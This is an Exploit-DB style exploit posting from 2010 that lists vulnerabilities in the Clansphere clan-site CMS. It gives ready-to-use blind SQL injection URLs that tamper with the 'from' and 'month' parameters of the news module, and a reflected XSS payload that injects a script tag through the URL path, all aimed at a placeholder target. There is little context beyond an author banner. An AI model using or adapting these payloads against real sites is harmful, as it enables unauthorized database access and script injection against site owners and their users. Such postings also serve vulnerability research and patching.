Author: Sweet type: webapps platform: php port: date_added: 2010-08-25 date_updated: 2010-08-25 verified: 0 codes: OSVDB-67414 tags: aliases: screenshot_url: application_url: http://www.exploit-db.comclansphere_2010.0_rc_2_p2.zip
############################################################################
# #
# Exploit Title: Clansphere Multiple vulnerabilities #
# #
# Date: 24/08/2010 #
# #
# Author: Sweet #
# #
# Contact : charif38@hotmail.fr #
# #
# Software Link: #
# #
# Download:http: http://sourceforge.net/projects/clansphere/ #
# #
# Version: all #
# #
# Tested on: WinXp sp3 #
# #
# Risk : HIGHT #
# #
# #
# Description : clansphere offers some nice features for #
# #
# you to easily set up and maintain your proper clan site within minutes! #
# #
############################################################################
1- Blind Sql injection :
http://www.target.com/clanspherepath/index.php?mod=news&action=recent&id=0&from=list'+and+31337-31337=0+--+
http://www.target.com/clansphere/index.php?mod=news&action=recent&year=2009&month=8"+and+31337-31337=0+--+
2-Xss :
http://www.target.com/clansphere/index.php/>"><ScRiPt>alert("sweet")</ScRiPt>
Saha Ftourkoum et 1,2,3 viva L'Algerie :))